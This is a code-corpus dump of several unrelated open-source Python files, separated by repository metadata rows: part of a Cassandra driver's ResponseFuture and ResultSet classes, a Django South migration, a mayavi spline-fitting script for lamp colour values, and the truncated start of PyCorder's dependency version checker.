log.debug("[control connection] Control connection host (%s) is being removed. Reconnecting", host)
# refresh will be done on reconnect
self.reconnect()
else:
self.refresh_node_list_and_token_map(force_token_rebuild=True)
def get_connections(self):
c = getattr(self, '_connection', None)
return [c] if c else []
def return_connection(self, connection):
if connection is self._connection and (connection.is_defunct or connection.is_closed):
self.reconnect()
def _stop_scheduler(scheduler, thread):
try:
if not scheduler.is_shutdown:
scheduler.shutdown()
except ReferenceError:
pass
thread.join()
class _Scheduler(Thread):
_queue = None
_scheduled_tasks = None
_executor = None
is_shutdown = False
def __init__(self, executor):
self._queue = Queue.PriorityQueue()
self._scheduled_tasks = set()
self._count = count()
self._executor = executor
Thread.__init__(self, name="Task Scheduler")
self.daemon = True
self.start()
def shutdown(self):
try:
log.debug("Shutting down Cluster Scheduler")
except AttributeError:
# this can happen on interpreter shutdown
pass
self.is_shutdown = True
self._queue.put_nowait((0, 0, None))
self.join()
def schedule(self, delay, fn, *args, **kwargs):
self._insert_task(delay, (fn, args, tuple(kwargs.items())))
def schedule_unique(self, delay, fn, *args, **kwargs):
task = (fn, args, tuple(kwargs.items()))
if task not in self._scheduled_tasks:
self._insert_task(delay, task)
else:
log.debug("Ignoring schedule_unique for already-scheduled task: %r", task)
def _insert_task(self, delay, task):
if not self.is_shutdown:
run_at = time.time() + delay
self._scheduled_tasks.add(task)
self._queue.put_nowait((run_at, next(self._count), task))
else:
log.debug("Ignoring scheduled task after shutdown: %r", task)
def run(self):
while True:
if self.is_shutdown:
return
try:
while True:
run_at, i, task = self._queue.get(block=True, timeout=None)
if self.is_shutdown:
if task:
log.debug("Not executing scheduled task due to Scheduler shutdown")
return
if run_at <= time.time():
self._scheduled_tasks.discard(task)
fn, args, kwargs = task
kwargs = dict(kwargs)
future = self._executor.submit(fn, *args, **kwargs)
future.add_done_callback(self._log_if_failed)
else:
self._queue.put_nowait((run_at, i, task))
break
except Queue.Empty:
pass
time.sleep(0.1)
def _log_if_failed(self, future):
exc = future.exception()
if exc:
log.warning(
"An internally scheduled tasked failed with an unhandled exception:",
exc_info=exc)
def refresh_schema_and_set_result(control_conn, response_future, **kwargs):
try:
log.debug("Refreshing schema in response to schema change. "
"%s", kwargs)
response_future.is_schema_agreed = control_conn._refresh_schema(response_future._connection, **kwargs)
except Exception:
log.exception("Exception refreshing schema in response to schema change:")
response_future.session.submit(control_conn.refresh_schema, **kwargs)
finally:
response_future._set_final_result(None)
class ResponseFuture(object):
"""
An asynchronous response delivery mechanism that is returned from calls
to :meth:`.Session.execute_async()`.
There are two ways for results to be delivered:
- Synchronously, by calling :meth:`.result()`
- Asynchronously, by attaching callback and errback functions via
:meth:`.add_callback()`, :meth:`.add_errback()`, and
:meth:`.add_callbacks()`.
"""
query = None
"""
The :class:`~.Statement` instance that is being executed through this
:class:`.ResponseFuture`.
"""
is_schema_agreed = True
"""
For DDL requests, this may be set ``False`` if the schema agreement poll after the response fails.
Always ``True`` for non-DDL requests.
"""
session = None
row_factory = None
message = None
default_timeout = None
_req_id = None
_final_result = _NOT_SET
_col_names = None
_final_exception = None
_query_traces = None
_callbacks = None
_errbacks = None
_current_host = None
_current_pool = None
_connection = None
_query_retries = 0
_start_time = None
_metrics = None
_paging_state = None
_custom_payload = None
_warnings = None
_timer = None
_protocol_handler = ProtocolHandler
_warned_timeout = False
def __init__(self, session, message, query, timeout, metrics=None, prepared_statement=None):
self.session = session
self.row_factory = session.row_factory
self.message = message
self.query = query
self.timeout = timeout
self._metrics = metrics
self.prepared_statement = prepared_statement
self._callback_lock = Lock()
if metrics is not None:
self._start_time = time.time()
self._make_query_plan()
self._event = Event()
self._errors = {}
self._callbacks = []
self._errbacks = []
def _start_timer(self):
if self.timeout is not None:
self._timer = self.session.cluster.connection_class.create_timer(self.timeout, self._on_timeout)
def _cancel_timer(self):
if self._timer:
self._timer.cancel()
def _on_timeout(self):
errors = self._errors
if not errors:
if self.is_schema_agreed:
errors = {self._current_host.address: "Client request timeout. See Session.execute[_async](timeout)"}
else:
connection = getattr(self.session.cluster.control_connection, '_connection')
host = connection.host if connection else 'unknown'
errors = {host: "Request timed out while waiting for schema agreement. See Session.execute[_async](timeout) and Cluster.max_schema_agreement_wait."}
self._set_final_exception(OperationTimedOut(errors, self._current_host))
def _make_query_plan(self):
# convert the list/generator/etc to an iterator so that subsequent
# calls to send_request (which retries may do) will resume where
# they last left off
self.query_plan = iter(self.session._load_balancer.make_query_plan(
self.session.keyspace, self.query))
def send_request(self):
""" Internal """
# query_plan is an iterator, so this will resume where we last left
# off if send_request() is called multiple times
start = time.time()
for host in self.query_plan:
req_id = self._query(host)
if req_id is not None:
self._req_id = req_id
# timer is only started here, after we have at least one message queued
# this is done to avoid overrun of timers with unfettered client requests
# in the case of full disconnect, where no hosts will be available
if self._timer is None:
self._start_timer()
return
if self.timeout is not None and time.time() - start > self.timeout:
self._on_timeout()
return
self._set_final_exception(NoHostAvailable(
"Unable to complete the operation against any hosts", self._errors))
def _query(self, host, message=None, cb=None):
if message is None:
message = self.message
if cb is None:
cb = self._set_result
pool = self.session._pools.get(host)
if not pool:
self._errors[host] = ConnectionException("Host has been marked down or removed")
return None
elif pool.is_shutdown:
self._errors[host] = ConnectionException("Pool is shutdown")
return None
self._current_host = host
self._current_pool = pool
connection = None
try:
# TODO get connectTimeout from cluster settings
connection, request_id = pool.borrow_connection(timeout=2.0)
self._connection = connection
connection.send_msg(message, request_id, cb=cb, encoder=self._protocol_handler.encode_message, decoder=self._protocol_handler.decode_message)
return request_id
except NoConnectionsAvailable as exc:
log.debug("All connections for host %s are at capacity, moving to the next host", host)
self._errors[host] = exc
return None
except Exception as exc:
log.debug("Error querying host %s", host, exc_info=True)
self._errors[host] = exc
if self._metrics is not None:
self._metrics.on_connection_error()
if connection:
pool.return_connection(connection)
return None
@property
def has_more_pages(self):
"""
Returns :const:`True` if there are more pages left in the
query results, :const:`False` otherwise. This should only
be checked after the first page has been returned.
.. versionadded:: 2.0.0
"""
return self._paging_state is not None
@property
def warnings(self):
"""
Warnings returned from the server, if any. This will only be
set for protocol_version 4+.
Warnings may be returned for such things as oversized batches,
or too many tombstones in slice queries.
Ensure the future is complete before trying to access this property
(call :meth:`.result()`, or after callback is invoked).
Otherwise it may throw if the response has not been received.
"""
# TODO: When timers are introduced, just make this wait
if not self._event.is_set():
raise DriverException("warnings cannot be retrieved before ResponseFuture is finalized")
return self._warnings
@property
def custom_payload(self):
"""
The custom payload returned from the server, if any. This will only be
set by Cassandra servers implementing a custom QueryHandler, and only
for protocol_version 4+.
Ensure the future is complete before trying to access this property
(call :meth:`.result()`, or after callback is invoked).
Otherwise it may throw if the response has not been received.
:return: :ref:`custom_payload`.
"""
# TODO: When timers are introduced, just make this wait
if not self._event.is_set():
raise DriverException("custom_payload cannot be retrieved before ResponseFuture is finalized")
return self._custom_payload
def start_fetching_next_page(self):
"""
If there are more pages left in the query result, this asynchronously
starts fetching the next page. If there are no pages left, :exc:`.QueryExhausted`
is raised. Also see :attr:`.has_more_pages`.
This should only be called after the first page has been returned.
.. versionadded:: 2.0.0
"""
if not self._paging_state:
raise QueryExhausted()
self._make_query_plan()
self.message.paging_state = self._paging_state
self._event.clear()
self._final_result = _NOT_SET
self._final_exception = None
self._timer = None # clear cancelled timer; new one will be set when request is queued
self.send_request()
def _reprepare(self, prepare_message):
cb = partial(self.session.submit, self._execute_after_prepare)
request_id = self._query(self._current_host, prepare_message, cb=cb)
if request_id is None:
# try to submit the original prepared statement on some other host
self.send_request()
def _set_result(self, response):
try:
if self._current_pool and self._connection:
self._current_pool.return_connection(self._connection)
trace_id = getattr(response, 'trace_id', None)
if trace_id:
if not self._query_traces:
self._query_traces = []
self._query_traces.append(QueryTrace(trace_id, self.session))
self._warnings = getattr(response, 'warnings', None)
self._custom_payload = getattr(response, 'custom_payload', None)
if isinstance(response, ResultMessage):
if response.kind == RESULT_KIND_SET_KEYSPACE:
session = getattr(self, 'session', None)
# since we're running on the event loop thread, we need to
# use a non-blocking method for setting the keyspace on
# all connections in this session, otherwise the event
# loop thread will deadlock waiting for keyspaces to be
# set. This uses a callback chain which ends with
# self._set_keyspace_completed() being called in the
# event loop thread.
if session:
session._set_keyspace_for_all_pools(
response.results, self._set_keyspace_completed)
elif response.kind == RESULT_KIND_SCHEMA_CHANGE:
# refresh the schema before responding, but do it in another
# thread instead of the event loop thread
self.is_schema_agreed = False
self.session.submit(
refresh_schema_and_set_result,
self.session.cluster.control_connection,
self, **response.results)
else:
results = getattr(response, 'results', None)
if results is not None and response.kind == RESULT_KIND_ROWS:
self._paging_state = response.paging_state
self._col_names = results[0]
results = self.row_factory(*results)
self._set_final_result(results)
elif isinstance(response, ErrorMessage):
retry_policy = None
if self.query:
retry_policy = self.query.retry_policy
if not retry_policy:
retry_policy = self.session.cluster.default_retry_policy
if isinstance(response, ReadTimeoutErrorMessage):
if self._metrics is not None:
self._metrics.on_read_timeout()
retry = retry_policy.on_read_timeout(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, WriteTimeoutErrorMessage):
if self._metrics is not None:
self._metrics.on_write_timeout()
retry = retry_policy.on_write_timeout(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, UnavailableErrorMessage):
if self._metrics is not None:
self._metrics.on_unavailable()
retry = retry_policy.on_unavailable(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, OverloadedErrorMessage):
if self._metrics is not None:
self._metrics.on_other_error()
# need to retry against a different host here
log.warning("Host %s is overloaded, retrying against a different "
"host", self._current_host)
self._retry(reuse_connection=False, consistency_level=None)
return
elif isinstance(response, IsBootstrappingErrorMessage):
if self._metrics is not None:
self._metrics.on_other_error()
# need to retry against a different host here
self._retry(reuse_connection=False, consistency_level=None)
return
elif isinstance(response, PreparedQueryNotFound):
if self.prepared_statement:
query_id = self.prepared_statement.query_id
assert query_id == response.info, \
"Got different query ID in server response (%s) than we " \
"had before (%s)" % (response.info, query_id)
else:
query_id = response.info
try:
prepared_statement = self.session.cluster._prepared_statements[query_id]
except KeyError:
if not self.prepared_statement:
log.error("Tried to execute unknown prepared statement: id=%s",
query_id.encode('hex'))
self._set_final_exception(response)
return
else:
prepared_statement = self.prepared_statement
self.session.cluster._prepared_statements[query_id] = prepared_statement
current_keyspace = self._connection.keyspace
prepared_keyspace = prepared_statement.keyspace
if prepared_keyspace and current_keyspace != prepared_keyspace:
self._set_final_exception(
ValueError("The Session's current keyspace (%s) does "
"not match the keyspace the statement was "
"prepared with (%s)" %
(current_keyspace, prepared_keyspace)))
return
log.debug("Re-preparing unrecognized prepared statement against host %s: %s",
self._current_host, prepared_statement.query_string)
prepare_message = PrepareMessage(query=prepared_statement.query_string)
# since this might block, run on the executor to avoid hanging
# the event loop thread
self.session.submit(self._reprepare, prepare_message)
return
else:
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
return
retry_type, consistency = retry
if retry_type in (RetryPolicy.RETRY, RetryPolicy.RETRY_NEXT_HOST):
self._query_retries += 1
reuse = retry_type == RetryPolicy.RETRY
self._retry(reuse_connection=reuse, consistency_level=consistency)
elif retry_type is RetryPolicy.RETHROW:
self._set_final_exception(response.to_exception())
else: # IGNORE
if self._metrics is not None:
self._metrics.on_ignore()
self._set_final_result(None)
self._errors[self._current_host] = response.to_exception()
elif isinstance(response, ConnectionException):
if self._metrics is not None:
self._metrics.on_connection_error()
if not isinstance(response, ConnectionShutdown):
self._connection.defunct(response)
self._retry(reuse_connection=False, consistency_level=None)
elif isinstance(response, Exception):
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
else:
# we got some other kind of response message
msg = "Got unexpected message: %r" % (response,)
exc = ConnectionException(msg, self._current_host)
self._connection.defunct(exc)
self._set_final_exception(exc)
except Exception as exc:
# almost certainly caused by a bug, but we need to set something here
log.exception("Unexpected exception while handling result in ResponseFuture:")
self._set_final_exception(exc)
def _set_keyspace_completed(self, errors):
if not errors:
self._set_final_result(None)
else:
self._set_final_exception(ConnectionException(
"Failed to set keyspace on all hosts: %s" % (errors,)))
def _execute_after_prepare(self, response):
"""
Handle the response to our attempt to prepare a statement.
If it succeeded, run the original query again against the same host.
"""
if self._current_pool and self._connection:
self._current_pool.return_connection(self._connection)
if self._final_exception:
return
if isinstance(response, ResultMessage):
if response.kind == RESULT_KIND_PREPARED:
# use self._query to re-use the same host and
# at the same time properly borrow the connection
request_id = self._query(self._current_host)
if request_id is None:
# this host errored out, move on to the next
self.send_request()
else:
self._set_final_exception(ConnectionException(
"Got unexpected response when preparing statement "
"on host %s: %s" % (self._current_host, response)))
elif isinstance(response, ErrorMessage):
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
elif isinstance(response, ConnectionException):
log.debug("Connection error when preparing statement on host %s: %s",
self._current_host, response)
# try again on a different host, preparing again if necessary
self._errors[self._current_host] = response
self.send_request()
else:
self._set_final_exception(ConnectionException(
"Got unexpected response type when preparing "
"statement on host %s: %s" % (self._current_host, response)))
def _set_final_result(self, response):
self._cancel_timer()
if self._metrics is not None:
self._metrics.request_timer.addValue(time.time() - self._start_time)
with self._callback_lock:
self._final_result = response
self._event.set()
# apply each callback
for callback in self._callbacks:
fn, args, kwargs = callback
fn(response, *args, **kwargs)
def _set_final_exception(self, response):
self._cancel_timer()
if self._metrics is not None:
self._metrics.request_timer.addValue(time.time() - self._start_time)
with self._callback_lock:
self._final_exception = response
self._event.set()
for errback in self._errbacks:
fn, args, kwargs = errback
fn(response, *args, **kwargs)
def _retry(self, reuse_connection, consistency_level):
if self._final_exception:
# the connection probably broke while we were waiting
# to retry the operation
return
if self._metrics is not None:
self._metrics.on_retry()
if consistency_level is not None:
self.message.consistency_level = consistency_level
# don't retry on the event loop thread
self.session.submit(self._retry_task, reuse_connection)
def _retry_task(self, reuse_connection):
if self._final_exception:
# the connection probably broke while we were waiting
# to retry the operation
return
if reuse_connection and self._query(self._current_host) is not None:
return
# otherwise, move onto another host
self.send_request()
def result(self):
"""
Return the final result or raise an Exception if errors were
encountered. If the final result or error has not been set
yet, this method will block until it is set, or the timeout
set for the request expires.
Timeout is specified in the Session request execution functions.
If the timeout is exceeded, an :exc:`cassandra.OperationTimedOut` will be raised.
This is a client-side timeout. For more information
about server-side coordinator timeouts, see :class:`.policies.RetryPolicy`.
Example usage::
>>> future = session.execute_async("SELECT * FROM mycf")
>>> # do other stuff...
>>> try:
... rows = future.result()
... for row in rows:
... ... # process results
... except Exception:
... log.exception("Operation failed:")
"""
self._event.wait()
if self._final_result is not _NOT_SET:
return ResultSet(self, self._final_result)
else:
raise self._final_exception
def get_query_trace_ids(self):
"""
Returns the trace session ids for this future, if tracing was enabled (does not fetch trace data).
"""
return [trace.trace_id for trace in self._query_traces]
def get_query_trace(self, max_wait=None, query_cl=ConsistencyLevel.LOCAL_ONE):
"""
Fetches and returns the query trace of the last response, or `None` if tracing was
not enabled.
Note that this may raise an exception if there are problems retrieving the trace
details from Cassandra. If the trace is not available after `max_wait`,
:exc:`cassandra.query.TraceUnavailable` will be raised.
`query_cl` is the consistency level used to poll the trace tables.
"""
if self._query_traces:
return self._get_query_trace(len(self._query_traces) - 1, max_wait, query_cl)
def get_all_query_traces(self, max_wait_per=None, query_cl=ConsistencyLevel.LOCAL_ONE):
"""
Fetches and returns the query traces for all query pages, if tracing was enabled.
See note in :meth:`~.get_query_trace` regarding possible exceptions.
"""
if self._query_traces:
return [self._get_query_trace(i, max_wait_per, query_cl) for i in range(len(self._query_traces))]
return []
def _get_query_trace(self, i, max_wait, query_cl):
trace = self._query_traces[i]
if not trace.events:
trace.populate(max_wait=max_wait, query_cl=query_cl)
return trace
def add_callback(self, fn, *args, **kwargs):
"""
Attaches a callback function to be called when the final results arrive.
By default, `fn` will be called with the results as the first and only
argument. If `*args` or `**kwargs` are supplied, they will be passed
through as additional positional or keyword arguments to `fn`.
If an error is hit while executing the operation, a callback attached
here will not be called. Use :meth:`.add_errback()` or :meth:`add_callbacks()`
if you wish to handle that case.
If the final result has already been seen when this method is called,
the callback will be called immediately (before this method returns).
Note: in the case that the result is not available when the callback is added,
the callback is executed by IO event thread. This means that the callback
should not block or attempt further synchronous requests, because no further
IO will be processed until the callback returns.
**Important**: if the callback you attach results in an exception being
raised, **the exception will be ignored**, so please ensure your
callback handles all error cases that you care about.
Usage example::
>>> session = cluster.connect("mykeyspace")
>>> def handle_results(rows, start_time, should_log=False):
... if should_log:
... log.info("Total time: %f", time.time() - start_time)
... ...
>>> future = session.execute_async("SELECT * FROM users")
>>> future.add_callback(handle_results, time.time(), should_log=True)
"""
run_now = False
with self._callback_lock:
if self._final_result is not _NOT_SET:
run_now = True
else:
self._callbacks.append((fn, args, kwargs))
if run_now:
fn(self._final_result, *args, **kwargs)
return self
def add_errback(self, fn, *args, **kwargs):
"""
Like :meth:`.add_callback()`, but handles error cases.
An Exception instance will be passed as the first positional argument
to `fn`.
"""
run_now = False
with self._callback_lock:
if self._final_exception:
run_now = True
else:
self._errbacks.append((fn, args, kwargs))
if run_now:
fn(self._final_exception, *args, **kwargs)
return self
def add_callbacks(self, callback, errback,
callback_args=(), callback_kwargs=None,
errback_args=(), errback_kwargs=None):
"""
A convenient combination of :meth:`.add_callback()` and
:meth:`.add_errback()`.
Example usage::
>>> session = cluster.connect()
>>> query = "SELECT * FROM mycf"
>>> future = session.execute_async(query)
>>> def log_results(results, level='debug'):
... for row in results:
... log.log(level, "Result: %s", row)
>>> def log_error(exc, query):
... log.error("Query '%s' failed: %s", query, exc)
>>> future.add_callbacks(
... callback=log_results, callback_kwargs={'level': 'info'},
... errback=log_error, errback_args=(query,))
"""
self.add_callback(callback, *callback_args, **(callback_kwargs or {}))
self.add_errback(errback, *errback_args, **(errback_kwargs or {}))
def clear_callbacks(self):
with self._callback_lock:
self._callback = []
self._errback = []
def __str__(self):
result = "(no result yet)" if self._final_result is _NOT_SET else self._final_result
return "<ResponseFuture: query='%s' request_id=%s result=%s exception=%s host=%s>" \
% (self.query, self._req_id, result, self._final_exception, self._current_host)
__repr__ = __str__
class QueryExhausted(Exception):
"""
Raised when :meth:`.ResponseFuture.start_fetching_next_page()` is called and
there are no more pages. You can check :attr:`.ResponseFuture.has_more_pages`
before calling to avoid this.
.. versionadded:: 2.0.0
"""
pass
class ResultSet(object):
"""
An iterator over the rows from a query result. Also supplies basic equality
and indexing methods for backward-compatability. These methods materialize
the entire result set (loading all pages), and should only be used if the
total result size is understood. Warnings are emitted when paged results
are materialized in this fashion.
You can treat this as a normal iterator over rows::
>>> from cassandra.query import SimpleStatement
>>> statement = SimpleStatement("SELECT * FROM users", fetch_size=10)
>>> for user_row in session.execute(statement):
... process_user(user_row)
Whenever there are no more rows in the current page, the next page will
be fetched transparently. However, note that it *is* possible for
an :class:`Exception` to be raised while fetching the next page, just
like you might see on a normal call to ``session.execute()``.
"""
def __init__(self, response_future, initial_response):
self.response_future = response_future
self.column_names = response_future._col_names
self._set_current_rows(initial_response)
self._page_iter = None
self._list_mode = False
@property
def has_more_pages(self):
"""
True if the last response indicated more pages; False otherwise
"""
return self.response_future.has_more_pages
@property
def current_rows(self):
"""
The list of current page rows. May be empty if the result was empty,
or this is the last page.
"""
return self._current_rows or []
def __iter__(self):
if self._list_mode:
return iter(self._current_rows)
self._page_iter = iter(self._current_rows)
return self
def next(self):
try:
return next(self._page_iter)
except StopIteration:
if not self.response_future.has_more_pages:
if not self._list_mode:
self._current_rows = []
raise
self.fetch_next_page()
self._page_iter = iter(self._current_rows)
return next(self._page_iter)
__next__ = next
def fetch_next_page(self):
"""
Manually, synchronously fetch the next page. Supplied for manually retrieving pages
and inspecting :meth:`~.current_page`. It is not necessary to call this when iterating
through results; paging happens implicitly in iteration.
"""
if self.response_future.has_more_pages:
self.response_future.start_fetching_next_page()
result = self.response_future.result()
self._current_rows = result._current_rows # ResultSet has already _set_current_rows to the appropriate form
else:
self._current_rows = []
def _set_current_rows(self, result):
if isinstance(result, Mapping):
self._current_rows = [result] if result else []
return
try:
iter(result) # can't check directly for generator types because cython generators are different
self._current_rows = result
except TypeError:
self._current_rows = [result] if result else []
def _fetch_all(self):
self._current_rows = list(self)
self._page_iter = None
def _enter_list_mode(self, operator):
if self._list_mode:
return
if self._page_iter:
raise RuntimeError("Cannot use %s when results have been iterated." % operator)
if self.response_future.has_more_pages:
log.warning("Using %s on paged results causes entire result set to be materialized.", operator)
self._fetch_all() # done regardless of paging status in case the row factory produces a generator
self._list_mode = True
def __eq__(self, other):
self._enter_list_mode("equality operator")
return self._current_rows == other
def __getitem__(self, i):
self._enter_list_mode("index operator")
return self._current_rows[i]
def __nonzero__(self):
return bool(self._current_rows)
__bool__ = __nonzero__
def get_query_trace(self, max_wait_sec=None):
"""
Gets the last query trace from the associated future.
See :meth:`.ResponseFuture.get_query_trace` for details.
"""
return self.response_future.get_query_trace(max_wait_sec)
def get_all_query_traces(self, max_wait_sec_per=None):
"""
Gets all query traces from the associated future.
See :meth:`.ResponseFuture.get_all_query_traces` for details.
"""
return self.response_future.get_all_query_traces(max_wait_sec_per)
@property
def was_applied(self):
"""
For LWT results, returns whether the transaction was applied.
Result is indeterminate if called on a result that was not an LWT request.
Only valid when one of tne of the internal row factories is in use.
"""
if self.response_future.row_factory not in (named_tuple_factory, dict_factory, tuple_factory):
raise RuntimeError("Cannot determine LWT result with row factory %s" % (self.response_future.row_factsory,))
if len(self.current_rows) != 1:
raise RuntimeError("LWT result should have exactly one row. This has %d." % (len(self.current_rows)))
row = self.current_rows[0]
if isinstance(row, tuple):
return row[0]
else:
return row['[applied]']
|
apache-2.0
| -163,086,977,530,493,200
| 39.937397
| 187
| 0.613633
| false
| 4.512803
| false
| false
| false
|
Lisaveta-K/lisaveta-k.github.io
|
_site/tomat/apps/shops/migrations/0006_transport_company_removal.py
|
1
|
3193
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'TransportCompany'
db.delete_table(u'shops_transportcompany')
def backwards(self, orm):
# Adding model 'TransportCompany'
db.create_table(u'shops_transportcompany', (
('is_visible', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal(u'shops', ['TransportCompany'])
models = {
u'shops.city': {
'Meta': {'object_name': 'City', 'db_table': "'shops_cities'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'shops.delivery': {
'Meta': {'object_name': 'Delivery'},
'caption': ('django.db.models.fields.TextField', [], {}),
'content': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'is_retail': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'is_wholesale': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'shops.discount': {
'Meta': {'object_name': 'Discount'},
'id': ('django.db.models.fields.PositiveIntegerField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'shops.shop': {
'Meta': {'object_name': 'Shop'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'city': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shops'", 'to': u"orm['shops.City']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'phones': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'point': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'worktime': ('django.db.models.fields.CharField', [], {'max_length': '255'})
}
}
complete_apps = ['shops']
|
mit
| -2,002,103,304,827,569,700
| 50.516129
| 128
| 0.554964
| false
| 3.691329
| false
| false
| false
|
drhoet/marantz-hue-adapter
|
analysis/color_space_analysis.py
|
1
|
5469
|
import numpy as np
from mayavi import mlab
from scipy.interpolate import splprep, splev
from traits.api import HasTraits, Instance, Button, on_trait_change, Float
from traitsui.api import View, Item, HSplit, Group, VGroup
from mayavi.core.ui.api import MlabSceneModel, SceneEditor
################################################################################
# Remark: I used this script to find a good frequency -> xy values mapping. #
# I generated, as carefully as I could, all xy values the app would send to #
# the lamp. I did this by SLOOOOOOOWLY sliding through the slider, and #
# printing out all xy values I received, in order. I made 3 of those files, #
# which are ofc a bit different due to the speed I used not being constant, as #
# I'm not a robot. #
# I then used this script to find a good B-spline interpolation. On the screen #
# you can input a value for the smoothing factor s and recalculate + redraw #
# the interpolated function. I found a value of 0.001 for s to be good. #
# On the interpolated function, 411 equidistant samples are taken, one for #
# 0.05 frequency in the range 87.5 -> 108.00. #
# The xy values are then printed to the console. #
# #
# These values are copied in the colorspaces.py, since I didn't want to add #
# the dependency to scipy there. #
# #
# I executed this script in Enthought Canopy Version: 1.7.4.3348 (64 bit). #
# Required packages: #
# - numpy 1.10.4-1 #
# - mayavi 4.4.3-10 #
# - vtk 6.3.0-4 #
# - scipy 0.17.1-1 #
# - traits 4.5.0-1 #
# - traitsui 5.1.0-1 #
################################################################################
def read_file(filename):
linenb = 0
data = [[], [], []]
for line in open(filename, 'r'):
fields = line[1:-2].split(',')
data[0].append(linenb)
data[1].append(float(fields[0]))
data[2].append(float(fields[1]))
linenb = linenb + 1
return np.array(data)
class MyDialog(HasTraits):
p0 = read_file('testGO0.txt')
p1 = read_file('testGO1.txt')
p2 = read_file('testGO2.txt')
new_u = x = y = None
scene1 = Instance(MlabSceneModel, ())
scene2 = Instance(MlabSceneModel, ())
button1 = Button('Redraw')
button2 = Button('Redraw')
buttonSave = Button('Save')
s1 = Float
s2 = Float
@on_trait_change('button1')
def redraw_scene1(self):
self.redraw_scene(self.scene1, self.s1)
@on_trait_change('button2')
def redraw_scene2(self):
self.redraw_scene(self.scene2, self.s2)
@on_trait_change('buttonSave')
def save(self):
f = open('outputGO.txt', 'w')
f.write('freq = [\n')
for i in range(0, len(self.new_u)):
f.write(' [%s,%s],\n' % (self.x[i], self.y[i]))
f.write(']')
f.close()
def redraw_scene(self, scene, s):
mlab.clf(figure=scene.mayavi_scene)
mlab.plot3d(np.divide(self.p0[0], 100), self.p0[1], self.p0[2], tube_radius=0.005, color=(1, 0, 0), figure=scene.mayavi_scene)
mlab.plot3d(np.divide(self.p1[0], 100), self.p1[1], self.p1[2], tube_radius=0.005, color=(0, 1, 0), figure=scene.mayavi_scene)
mlab.plot3d(np.divide(self.p2[0], 100), self.p2[1], self.p2[2], tube_radius=0.005, color=(0, 0, 1), figure=scene.mayavi_scene)
tck, u = splprep([self.p1[1], self.p1[2]], u=np.linspace(87.50, 108.00, len(self.p1[0])), s=s, k=3)
self.new_u = np.linspace(87.50, 108.00, 411)
self.x, self.y = splev(self.new_u, tck, ext=2)
mlab.plot3d(np.divide(self.new_u, 100), self.x, self.y, tube_radius=0.005, color=(1, 1, 1), figure=scene.mayavi_scene)
# The layout of the dialog created
view = View(VGroup(
HSplit(
Group(
Item('scene1', editor=SceneEditor(), height=250,
width=300),
'button1',
's1',
show_labels=False,
),
Group(
Item('scene2',
editor=SceneEditor(), height=250,
width=300, show_label=False),
'button2',
's2',
show_labels=False,
)
),
'buttonSave',
show_labels=False
),
resizable=True,
)
m = MyDialog()
m.configure_traits()
|
mit
| 1,464,191,938,755,861,800
| 43.97479
| 134
| 0.449991
| false
| 3.829832
| false
| false
| false
|
mike-lawrence/actichampy
|
pycorder/loadlibs.py
|
1
|
3137
|
# -*- coding: utf-8 -*-
'''
Load required libraries and check versions
PyCorder ActiChamp Recorder
------------------------------------------------------------
Copyright (C) 2010, Brain Products GmbH, Gilching
PyCorder is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 3
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PyCorder. If not, see <http://www.gnu.org/licenses/>.
------------------------------------------------------------
@author: Norbert Hauser
@date: $Date: 2011-03-24 16:03:45 +0100 (Do, 24 Mrz 2011) $
@version: 1.0
B{Revision:} $LastChangedRevision: 62 $
'''
'''
------------------------------------------------------------
CHECK LIBRARY DEPENDENCIES
------------------------------------------------------------
'''
import sys
# required Python and library versions
ver_Python = "2.6"
ver_NumPy = ("1.3.0", "1.4.1")
ver_SciPy = ("0.7.1", "0.8.0")
ver_PyQt = ("4.5.2", "4.6.3")
ver_PyQwt = ("5.2.1",)
ver_lxml = ("2.2.4", "2.2.7")
# try to import python libraries, check versions
import_log = ""
if not ver_Python in sys.version:
import_log += "- Wrong Python version (%s), please install Python %s\r\n"%(sys.version, ver_Python)
try:
import numpy as np
if not np.__version__ in ver_NumPy:
import_log += "- Wrong NumPy version (%s), please install NumPy %s\r\n"%(np.__version__, ver_NumPy)
except ImportError:
import_log += "- NumPy missing, please install NumPy %s\r\n"%(str(ver_NumPy))
try:
import scipy as sc
if not sc.__version__ in ver_SciPy:
